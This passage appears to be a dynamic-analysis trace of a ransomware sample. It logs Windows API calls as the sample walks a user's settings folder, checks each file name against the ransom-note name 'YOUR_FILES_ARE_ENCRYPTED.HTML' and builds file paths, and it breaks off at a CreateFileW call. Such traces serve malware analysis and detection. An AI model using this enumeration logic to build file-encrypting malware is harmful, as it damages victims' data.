ftCreationTime.dwLowDateTime=0x2dad702f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2dad702f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e4, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", cAlternateFileName="AAA302~1.SET")) returned 1 [0121.650] StrStrIW (lpFirst="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.650] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms") returned 188 [0121.650] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms") returned=".settingcontent-ms" [0121.650] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.650] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms") returned=".settingcontent-ms" [0121.650] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e9e3c3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e9e3c3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e4, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", cAlternateFileName="AA94BF~1.SET")) returned 1 [0121.650] StrStrIW (lpFirst="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.650] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms") returned 188 [0121.650] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms") returned=".settingcontent-ms" [0121.650] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.650] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms") returned=".settingcontent-ms" [0121.650] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ed5138d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ed5138d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c1, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", cAlternateFileName="AADA5D~1.SET")) returned 1 [0121.650] StrStrIW (lpFirst="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.650] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms") returned 181 [0121.651] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms") returned=".settingcontent-ms" [0121.651] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.651] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms") returned=".settingcontent-ms" [0121.651] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x306f2868, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x306f2868, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e9, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", cAlternateFileName="AA9DA3~1.SET")) returned 1 [0121.651] StrStrIW (lpFirst="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.651] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms") returned 189 [0121.651] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms") returned=".settingcontent-ms" [0121.651] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.651] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms") returned=".settingcontent-ms" [0121.651] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31160d5f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x31160d5f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x532, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", cAlternateFileName="AAA8A2~1.SET")) returned 1 [0121.651] StrStrIW (lpFirst="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.651] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms") returned 203 [0121.651] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms") returned=".settingcontent-ms" [0121.651] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.651] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms") returned=".settingcontent-ms" [0121.651] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3170a66e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3170a66e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", cAlternateFileName="AA99F9~1.SET")) returned 1 [0121.651] StrStrIW (lpFirst="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.651] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms") returned 196 [0121.651] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms") returned=".settingcontent-ms" [0121.651] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.651] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms") returned=".settingcontent-ms" [0121.651] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31a77cfe, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x31a77cfe, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x512, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", cAlternateFileName="AA5480~1.SET")) returned 1 [0121.651] StrStrIW (lpFirst="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.651] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms") returned 197 [0121.651] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms") returned=".settingcontent-ms" [0121.651] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.651] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms") returned=".settingcontent-ms" [0121.651] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328ec16f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x328ec16f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x521, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", cAlternateFileName="AA13E8~1.SET")) returned 1 [0121.651] StrStrIW (lpFirst="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.652] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms") returned 200 [0121.652] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms") returned=".settingcontent-ms" [0121.652] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.652] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms") returned=".settingcontent-ms" [0121.652] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32f546a8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x32f546a8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", cAlternateFileName="AA6C9E~1.SET")) returned 1 [0121.652] StrStrIW (lpFirst="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.652] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms") returned 195 [0121.652] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms") returned=".settingcontent-ms" [0121.652] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.652] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms") returned=".settingcontent-ms" [0121.652] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x333a682b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x333a682b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ff, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", cAlternateFileName="AAD1E2~1.SET")) returned 1 [0121.652] StrStrIW (lpFirst="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.652] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms") returned 194 [0121.652] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms") returned=".settingcontent-ms" [0121.652] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.652] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms") returned=".settingcontent-ms" [0121.652] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334d7c8a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x334d7c8a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x519, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", cAlternateFileName="AA5259~1.SET")) returned 1 [0121.652] StrStrIW (lpFirst="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.652] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms") returned 196 [0121.652] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms") returned=".settingcontent-ms" [0121.652] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.652] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms") returned=".settingcontent-ms" [0121.652] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336554be, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x336554be, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2339a047, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x54b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", cAlternateFileName="AA2361~2.SET")) returned 1 [0121.652] StrStrIW (lpFirst="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.652] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms") returned 206 [0121.652] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms") returned=".settingcontent-ms" [0121.652] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.652] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms") returned=".settingcontent-ms" [0121.652] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33a5b30a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33a5b30a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x57d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", cAlternateFileName="AA9A7D~1.SET")) returned 1 [0121.653] StrStrIW (lpFirst="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.653] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms") returned 216 [0121.653] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms") returned=".settingcontent-ms" [0121.653] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.653] PathFindExtensionW (pszPath="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms") returned=".settingcontent-ms" [0121.653] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33f6c454, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f6c454, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x520, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", cAlternateFileName="AA8BA7~1.SET")) returned 1 [0121.653] StrStrIW (lpFirst="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.653] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms") returned 197 [0121.653] PathFindExtensionW (pszPath="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms") returned=".settingcontent-ms" [0121.653] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.653] PathFindExtensionW (pszPath="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms") returned=".settingcontent-ms" [0121.653] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x344c97b6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x344c97b6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", cAlternateFileName="AA6260~1.SET")) returned 1 [0121.653] StrStrIW (lpFirst="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.653] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms") returned 202 [0121.653] PathFindExtensionW (pszPath="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms") returned=".settingcontent-ms" [0121.653] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.653] PathFindExtensionW (pszPath="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms") returned=".settingcontent-ms" [0121.653] StrStrIW (lpFirst="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.654] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms") returned 197 [0121.654] PathFindExtensionW (pszPath="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms") returned=".settingcontent-ms" [0121.654] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.654] PathFindExtensionW (pszPath="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms") returned=".settingcontent-ms" [0121.654] StrStrIW (lpFirst="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.654] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms") returned 202 [0121.654] PathFindExtensionW (pszPath="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms") returned=".settingcontent-ms" [0121.654] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.654] PathFindExtensionW (pszPath="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms") returned=".settingcontent-ms" [0121.654] StrStrIW (lpFirst="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.654] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms") returned 192 [0121.654] PathFindExtensionW (pszPath="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms") returned=".settingcontent-ms" [0121.654] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.654] PathFindExtensionW (pszPath="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms") returned=".settingcontent-ms" [0121.654] StrStrIW (lpFirst="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.654] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms") returned 192 [0121.654] PathFindExtensionW (pszPath="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms") returned=".settingcontent-ms" [0121.654] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.654] PathFindExtensionW (pszPath="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms") returned=".settingcontent-ms" [0121.654] PathFindExtensionW (pszPath="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.654] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.654] PathFindExtensionW (pszPath="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.654] PathFindExtensionW (pszPath="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms") returned=".settingcontent-ms" [0121.654] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.654] PathFindExtensionW (pszPath="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms") returned=".settingcontent-ms" [0121.654] PathFindExtensionW (pszPath="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms") returned=".settingcontent-ms" [0121.655] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.655] PathFindExtensionW (pszPath="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms") returned=".settingcontent-ms" [0121.655] PathFindExtensionW (pszPath="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms") returned=".settingcontent-ms" [0121.655] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.655] PathFindExtensionW (pszPath="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms") returned=".settingcontent-ms" [0121.679] GetProcessHeap () returned 0x600000 [0121.679] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.679] CreateFileW 